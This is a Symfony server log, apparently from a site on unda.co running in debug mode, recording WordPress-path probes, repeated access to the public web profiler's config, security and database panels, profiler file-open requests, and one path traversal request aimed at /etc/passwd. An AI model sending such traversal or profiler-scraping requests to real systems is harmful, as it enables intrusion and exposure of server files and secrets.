[2025-12-20 22:15:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:15:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:19:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320","method":"GET"} []
[2025-12-20 22:19:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 22:20:18] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fmonolog-bundle&line=0","method":"GET"} []
[2025-12-20 22:21:37] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 22:22:44] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FTwigBundle&line=0","method":"GET"} []
[2025-12-20 22:23:19] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","method":"GET"} []
[2025-12-20 22:23:19] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-20 22:23:19] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 22:23:19] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-20 22:23:19] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 22:23:19] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 22:23:19] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 22:25:16] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FHttpKernel%2FEventListener%2FFragmentListener.php&line=68","method":"GET"} []
[2025-12-20 22:27:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cd6bf0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/cd6bf0","method":"GET"} []
[2025-12-20 22:27:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 22:30:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"35e76f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/35e76f?panel=cache","method":"GET"} []
[2025-12-20 22:30:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 22:31:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException: "" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php line 90 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException(code: 0): at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php:90)"} []
[2025-12-20 22:32:48] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FWebProfilerBundle&line=0","method":"GET"} []
[2025-12-20 22:39:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"533e9e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/533e9e?panel=config","method":"GET"} []
[2025-12-20 22:39:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 22:39:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=cache","method":"GET"} []
[2025-12-20 22:39:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 22:40:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 22:42:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cd6bf0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/cd6bf0?panel=config","method":"GET"} []
[2025-12-20 22:42:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 22:45:18] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsensio%2Fdistribution-bundle&line=0","method":"GET"} []
[2025-12-20 22:45:20] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=src%2FAppBundle&line=0","method":"GET"} []
[2025-12-20 22:45:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?panel=config","method":"GET"} []
[2025-12-20 22:45:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 22:47:44] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Faws%2Faws-sdk-php-symfony%2Fsrc&line=0","method":"GET"} []
[2025-12-20 22:48:31] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 22:53:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1bb1dd","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1bb1dd","method":"GET"} []
[2025-12-20 22:53:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 22:58:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"40234e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/40234e?panel=db","method":"GET"} []
[2025-12-20 22:58:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 22:58:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b6e509","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b6e509?panel=config","method":"GET"} []
[2025-12-20 22:58:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 22:58:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c07d72","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c07d72?panel=cache","method":"GET"} []
[2025-12-20 22:58:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 23:10:18] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FWebServerBundle&line=0","method":"GET"} []
[2025-12-20 23:12:44] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FDebugBundle&line=0","method":"GET"} []
[2025-12-20 23:16:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7edbd1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/7edbd1?panel=logger","method":"GET"} []
[2025-12-20 23:16:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-20 23:17:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c07d72","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c07d72?panel=config","method":"GET"} []
[2025-12-20 23:17:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 23:18:11] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6310fa","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/6310fa/search/results?limit=10","method":"GET"} []
[2025-12-20 23:18:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10","method":"GET"} []
[2025-12-20 23:19:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=104.234.115.18&limit=10&method=GET","method":"GET"} []
[2025-12-20 23:19:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=104.234.115.18&limit=10&method=GET","method":"GET"} []
[2025-12-20 23:20:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42","method":"GET"} []
[2025-12-20 23:20:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 23:20:22] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"17a8da","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/17a8da/search/results?ip=66.249.69.165&limit=10","method":"GET"} []
[2025-12-20 23:20:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=66.249.69.165&limit=10","method":"GET"} []
[2025-12-20 23:22:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"85806e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/85806e?panel=dump","method":"GET"} []
[2025-12-20 23:22:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-20 23:23:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d3b11a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d3b11a?panel=twig","method":"GET"} []
[2025-12-20 23:23:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 23:25:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=time","method":"GET"} []
[2025-12-20 23:25:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 23:27:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f4dabc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f4dabc?panel=config","method":"GET"} []
[2025-12-20 23:27:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 23:33:22] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 23:34:50] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 23:35:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=swiftmailer","method":"GET"} []
[2025-12-20 23:35:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-20 23:36:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=twig","method":"GET"} []
[2025-12-20 23:36:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 23:38:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7fc15c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/7fc15c","method":"GET"} []
[2025-12-20 23:38:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 23:38:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c07d72","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c07d72?panel=twig","method":"GET"} []
[2025-12-20 23:38:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 23:39:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8a2fcc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8a2fcc?panel=security","method":"GET"} []
[2025-12-20 23:39:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 23:45:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"bfdac7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/bfdac7?panel=twig","method":"GET"} []
[2025-12-20 23:45:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 23:51:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c03d3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c03d3?panel=config","method":"GET"} []
[2025-12-20 23:51:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 23:52:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb19b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb19b2?panel=logger","method":"GET"} []
[2025-12-20 23:52:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-20 23:57:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c07d72","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c07d72","method":"GET"} []
[2025-12-20 23:57:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 00:00:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-21 00:00:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=validator","method":"GET"} []
[2025-12-21 00:00:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-21 00:02:44] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=src%2FHona%2FAuthBundle&line=0","method":"GET"} []
[2025-12-21 00:04:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/images/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/images/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /files/" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /files/\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 00:04:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /images/" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /images/\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
